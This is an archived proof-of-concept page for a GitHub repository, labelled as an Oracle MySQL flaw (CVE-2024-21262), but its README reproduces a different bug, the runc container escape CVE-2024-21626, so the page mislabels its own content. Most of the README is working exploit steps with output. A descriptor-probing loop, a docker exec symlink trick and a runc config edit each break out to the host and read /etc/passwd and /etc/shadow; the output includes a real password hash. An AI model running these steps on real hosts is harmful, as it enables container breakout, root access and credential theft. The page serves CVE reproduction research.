Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-21262 PoC — Oracle MySQL 安全漏洞

Source
https://github.com/Noah4Puppy/CVE-2024-21262
Associated Vulnerability
Title:Oracle MySQL 安全漏洞 (CVE-2024-21262)
Description:Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。MySQL Connectors是其中的一个连接使用MySQL的应用程序的驱动程序。 Oracle MySQL 的 MySQL Connectors 9.0.0版本及之前版本存在安全漏洞。攻击者利用该漏洞可以更新、插入或删除可访问的数据。
Description
THREE different reproduction, WORKDIR, EXEC & RUNC.
Readme
# RECORDS
Only for reproduction of CVEs.

Related Resources:

- [LINK](https://nitroc.org/en/posts/cve-2024-21626-illustrated/?utm_source=chatgpt.com#exploit-via-docker-exec)
- [GITHUB_1](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC#)
- [GITHUB_2](https://github.com/cdxiaodong/CVE-2024-21626)
- [ISSUE](https://github.com/NitroCao/CVE-2024-21626/issues/1)
----
## Check Envs
Download docker-24.0.6.tgz from https://download.docker.com/linux/static/stable/x86_64/.
```shell
sudo mkdir -p /usr/local/docker-24.0.6

sudo tar -xzf docker-24.0.6.tgz -C /usr/local/docker-24.0.6

sudo ln -sf /usr/local/docker-24.0.6/docker/* /usr/local/bin/

sudo ln -sf /usr/local/docker-24.0.6/docker/docker /usr/local/bin/docker

runc --version
docker --version
containerd --version
```
Your expectation:
install X<=24.0.6 docker with Y<=1.1.9 runc.
```shell
runc version 1.1.9
commit: v1.1.9-0-gccaecfc
spec: 1.0.2-dev
go: go1.20.7
libseccomp: 2.5.1

Docker version 24.0.6, build ed223bc

containerd github.com/containerd/containerd v1.7.3 7880925980b188f4c97b462f709d0db8e8962aff
```

My Environment:
- Ubuntu 20.04
- Docker 24.0.6
- runc 1.1.9
- containerd 1.7.3


## SET daemon.json
```shell
sudo gedit /etc/docker/daemon.json
```
ADD this:
```json
{
  "registry-mirrors": [
    "https://docker.imgdb.de",
    "https://docker.xuanyuan.me",
    "https://doublezonline.cloud",
    "https://docker.wanpeng.top"
  ]
}
```
system debian:
```shell
systemctl daemon-reload
systemctl restart docker
```
static tgz:(temporary each time reset)
```shell
sudo pkill dockerd 2>/dev/null || true
sudo dockerd &
```
New terminal:
```shell
docker version
docker run hello-world
```

## ADD USER
```shell
sudo usermod -aG docker $USER
newgrp docker
id
```


## WORKDIR
`fd/?` can be detected by bomb:
```shell
#!/bin/bash
for i in {3..10} ; do
    docker run -w /proc/1/fd/$i ubuntu cat ../../../../../etc/passwd 
done
```

```shell
docker run -w /proc/1/fd/9 ubuntu:latest cat ../../../../../etc/passwd
# if it fails, use:
# docker run -w /proc/self/fd/9 ubuntu:latest cat ../../../../../etc/shadow
# docker run -w /proc/self/fd/9 ubuntu:latest cat ../../../../../etc/passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:127:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
geoclue:x:123:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:127:132:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
puppy:x:1000:1000:puppy,,,:/home/puppy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
```

## EXEC
shell: -> in container
```shell
# open a terminal 1
docker run --name test_book --rm -it debian:bookworm
# failure
# ln -sf /proc/self/fd/8 /bar
# success
ln -sf /proc/self/fd/7 /test

# open a new terminal 2
docker exec -it -w /bar test_book sleep 1200
# 3,6,9->unknown
# 1,2,4,5,8->unexisted
# 7 success no output

# return terminal 1
ls -F /proc
# check the latest id as your choice 

cat /proc/id/cmdline
# cat/proc/id/cmdline (try each one until occur: sleep1200)
# once: cat /proc/184/cmdline
ls -al /proc/id/cwd/../../../../home

ls -al /proc/184/cwd/../../../../home
# success
total 12
drwxr-xr-x  3 root root 4096 Mar 25  2025 .
drwxr-xr-x 20 root root 4096 Mar 25  2025 ..
drwxr-xr-x 20 1000 1000 4096 Oct  8 08:56 puppy

# enter home/user
ls -al /proc/184/cwd/../../../../home/puppy
# success
total 108
drwxr-xr-x 20 1000 1000  4096 Oct  8 08:56 .
drwxr-xr-x  3 root root  4096 Mar 25  2025 ..
-rw-------  1 1000 1000 10382 Oct 10 06:49 .bash_history
-rw-r--r--  1 1000 1000   220 Mar 25  2025 .bash_logout
-rw-r--r--  1 1000 1000  3771 Mar 25  2025 .bashrc
drwx------ 16 1000 1000  4096 Oct  8 11:05 .cache
drwx------ 14 1000 1000  4096 Oct  7 13:40 .config
drwx------  3 1000 1000  4096 Mar 25  2025 .gnupg
drwx------  5 1000 1000  4096 Oct  8 11:14 .local
drwx------  4 1000 1000  4096 Mar 27  2025 .mozilla
-rw-r--r--  1 1000 1000   367 Mar 27  2025 .pam_environment
drwx------  3 1000 1000  4096 Oct  7 13:40 .pki
-rw-r--r--  1 1000 1000   807 Mar 25  2025 .profile
drwx------  2 1000 1000  4096 Oct  8 08:56 .ssh
-rw-r--r--  1 1000 1000     0 Mar 27  2025 .sudo_as_admin_successful
drwxrwxr-x  4 1000 1000  4096 Oct  7 13:40 .vscode
drwxrwxr-x  8 1000 1000  4096 Oct  8 14:30 Assignments
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Desktop
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Documents
drwxr-xr-x  2 1000 1000  4096 Mar 27  2025 Downloads
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Music
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Pictures
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Public
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Templates
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Videos
drwx------  3 1000 1000  4096 Mar 27  2025 snap

cat /proc/id/cwd/../../../../etc/hostname

cat /proc/184/cwd/../../../../etc/hostname
# puppy-virtual-machine
cat /etc/hostname
current container root
```

-------------------

## RUNC directly
- check runc version:
```shell
runc --version
runc version 1.1.9
commit: v1.1.9-0-gccaecfc
spec: 1.0.2-dev
go: go1.20.7
libseccomp: 2.5.1
```
- Steps:
```shell
docker run --name helper-ctr alpine

# save tar as launching
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
runc spec

# create config.json
# most condition is 7, else use bomb to get
sed -ri 's#(\s*"cwd":)"(/)"#\1 "/proc/self/fd/7"#g' config.json

gedit config.json
# edit "cwd": "/proc/self/fd/8", id=7 is not OK for my env
grep cwd config.json

# --log
sudo runc --log ./log.json run demo
# Failure it means your cwd is wrong: 
runc run failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory
# Success enter shellcode and get root
whoami
root

# get shadow and passwd
cat ./../../../../../etc/shadow
cat ./../../../../../etc/passwd
# shadow info
root:!:20172:0:99999:7:::
daemon:*:19432:0:99999:7:::
bin:*:19432:0:99999:7:::
sys:*:19432:0:99999:7:::
sync:*:19432:0:99999:7:::
games:*:19432:0:99999:7:::
man:*:19432:0:99999:7:::
lp:*:19432:0:99999:7:::
mail:*:19432:0:99999:7:::
news:*:19432:0:99999:7:::
uucp:*:19432:0:99999:7:::
proxy:*:19432:0:99999:7:::
www-data:*:19432:0:99999:7:::
backup:*:19432:0:99999:7:::
list:*:19432:0:99999:7:::
irc:*:19432:0:99999:7:::
gnats:*:19432:0:99999:7:::
nobody:*:19432:0:99999:7:::
systemd-network:*:19432:0:99999:7:::
systemd-resolve:*:19432:0:99999:7:::
systemd-timesync:*:19432:0:99999:7:::
messagebus:*:19432:0:99999:7:::
syslog:*:19432:0:99999:7:::
_apt:*:19432:0:99999:7:::
tss:*:19432:0:99999:7:::
uuidd:*:19432:0:99999:7:::
tcpdump:*:19432:0:99999:7:::
avahi-autoipd:*:19432:0:99999:7:::
usbmux:*:19432:0:99999:7:::
rtkit:*:19432:0:99999:7:::
dnsmasq:*:19432:0:99999:7:::
cups-pk-helper:*:19432:0:99999:7:::
speech-dispatcher:!:19432:0:99999:7:::
avahi:*:19432:0:99999:7:::
kernoops:*:19432:0:99999:7:::
saned:*:19432:0:99999:7:::
nm-openvpn:*:19432:0:99999:7:::
hplip:*:19432:0:99999:7:::
whoopsie:*:19432:0:99999:7:::
colord:*:19432:0:99999:7:::
fwupd-refresh:*:19432:0:99999:7:::
geoclue:*:19432:0:99999:7:::
pulse:*:19432:0:99999:7:::
gnome-initial-setup:*:19432:0:99999:7:::
gdm:*:19432:0:99999:7:::
sssd:*:19432:0:99999:7:::
puppy:$6$n.X.gr9p8dot4UMU$SZvp7KLsk3E/M4Nedom.7R27UzvXi5gqA7Z6z51GFyIl2yehiytV23REPy22XoiF7jBvRdv.uWqs1vnvvGEy30:20172:0:99999:7:::
systemd-coredump:!!:20172::::::
```

**Pay attention to file descriptors, in different environment, sometimes the value of key cwd is different so it needs to run bomb scripts.**
File Snapshot

 [4.0K]  /data/pocs/ce37b3c598fd8126b3b9b5bf9ac5eacc9821e9ab
├── [ 747]  cons.sh
├── [ 173]  exec.sh
├── [9.7K]  README.md
├── [ 556]  runc.sh
└── [ 216]  workdir.sh

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.